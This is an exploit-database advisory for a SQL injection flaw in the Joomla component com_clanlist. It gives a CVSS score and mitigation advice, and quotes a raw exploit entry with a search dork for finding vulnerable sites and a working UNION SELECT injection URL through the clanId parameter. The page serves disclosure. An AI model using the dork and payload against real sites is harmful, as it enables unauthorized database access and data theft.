Joomla Component (com_clanlist) SQL Injection Vulnerability

vendor:

com_clanlist

by:

CoBRa_21

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_clanlist

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component (com_clanlist) SQL Injection Vulnerability

A SQL injection vulnerability exists in the Joomla component com_clanlist. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a specially crafted SQL query that can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

########################################################################################

Joomla Component (com_clanlist) SQL Injection Vulnerability 

########################################################################################

Author : CoBRa_21

Dork : inurl:com_clanlist


########################################################################################
 
Sql Injection :

http://localhost/[path]/index.php?option=com_clanlist&clanId=-999 union select version()

########################################################################################

Thanks cyber-warrior.org  & AKINCILAR 

########################################################################################